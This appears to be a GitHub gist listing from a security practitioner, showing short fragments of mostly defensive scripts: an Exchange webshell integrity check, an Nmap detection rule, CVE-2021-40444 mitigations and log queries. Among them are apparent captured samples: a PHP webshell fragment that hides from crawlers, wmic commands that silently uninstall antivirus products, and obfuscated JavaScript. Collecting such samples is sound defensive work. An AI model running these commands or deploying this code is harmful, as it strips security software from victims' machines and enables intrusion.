This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Exchange IIS Server Integrity Check | |
Identify common webshells and backdoors associated with compromises | |
Usage: | |
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates | |
Write-IntegrityFile [ -hashfile "filename.json" ] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}} | |
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']'); | |
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']'); | |
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local http = require "http" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local table = require "table" | |
local string = require "string" | |
author = {"technion@lolware.net"} | |
license = "Same as Nmap--See https://nmap.org/book/man-legal.html" | |
categories = {"discovery", "safe"} | |
-- Detection rule based on: https://twitter.com/GossiTheDog/status/1424673929382268932 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set-Strictmode -Version 2 | |
# Applies reg keys from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 | |
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section | |
for($i = 0; $i -le 3; $i++) { | |
$RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i" | |
if (-not (Test-Path $RegPath)) { | |
New-Item $RegPath -Force | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$autorunsCsv = "\AutorunsOutput.csv" | |
$autorunsArray = Import-Csv $autorunsCsv | |
Foreach ($item in $autorunsArray) { | |
$detection = $item.'VT detection' | |
if ($detection -eq "" -or $detection -eq 'Unknown') { | |
continue | |
} | |
Write-Output $detection |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$v='ipc'; | |
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive | |
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive | |
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive | |
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive | |
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set-StrictMode -Version 2 | |
# Connect first | |
# Connect-AzureAD | |
function Get-LicencesforUser | |
{ | |
param([object]$user) | |
# $user should be populated with | |
# $user = Get-AzureADUser -ObjectId username@domain.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
!WA:2!1zvZUTTrq4YOwKc1IcB3a30FqbtBtacqRQLsIDQrqqfTLtuJSTcLSDcGrLwYDL42qUC7UlTLuVjKd5SEe0HCOON0JGFcim6tGrFc8lq7SKuYQUUxKwoC2DN5B(MVHgBTuWs4LWVX3jsseT6Bmjiet8Rk3JrvELqCQNO3UD6ijkJjyQK7J63K0tDnr)PwrmxVqr9qkt5SrLDAwXEItOateBe6hk(PC5Yvp3kfEWejkGO3AKG0UuKW)AN7GCFvxryedN6AIFx6NZFfHWll5exLnsrd9gNeGT4iLh)wGDFF53JeUigHhEmKcsfsrA56rKQcbLSWePl)PLzm4ACjsZgEiC4XorcMPGiPsL0KYmD9qktCKGY6AQ8iMnpgmwjGteHcPjH5c7wrefgkcv6OGzy1jKP4lSLGoW85riSaPqMnB64kc5T6x)DxPW9lEUknDpqG4BdrT9g1kVD9HsYVgbhjjhFXoHcskcKHm8vRQVOoixYHLX4qM8WdiOxvosGKhwxNGjl3MGPOdtTQ)9ENktYRxKwuYXxakNLX)sKurWe82uM3y4MGaVzFoXI6gYsl0aC1ks(8rAlvz66j)gUHH(WzX0H0MujYXNG9gj9rmLolCQUtJQBwzmSdmvJfY8ISen(ZMekOewkgnC)k2nRUr5ANKYhsJTpWcfPGYOk09iIqc(9(F7DNsTQch6nV2h)3wdcddmUief9(RfkfrXtw5(LTxBn7JSDWdDdd4qnu6LX3sI)pX(ykw5vK)5ZXwBb4Cas1INTWwrdiqjZnj8x1g4mc1(Ia4WqDj87E7Ifsyw7auwZh)y7eIcb)Ohz(DMLFYtS31SAdZgpTAtUz2EMEdflaeoLEFzwSyHmYjt9sbOFPgLFj)w)N9n7cZmfV(yCyRm3ABrH(X8oDG)KE5h3H2JGpqNOV(dVaLudm4lCrtvkE)EWALpLb4)EnRvDNk8BaHickxqFI1mN9olfe1wWahMVGLpDWaKaB2e4dkkFKK43jTn3A3Mn3DBB3Pn4gos |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# More information: https://support.microsoft.com/en-au/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc | |
Set-StrictMode -Version 2 | |
# Fetch all Domain Controllers. Use this pattern to fetch from all sites. | |
$addomain = Get-ADDomain | |
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)" | |
foreach ($dc in $controllers) { | |
# Errors are ignored so as not to throw an exception if there are no such logs found | |
Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict'; | |
/** @type {!Array} */ | |
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string", | |
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write" |
NewerOlder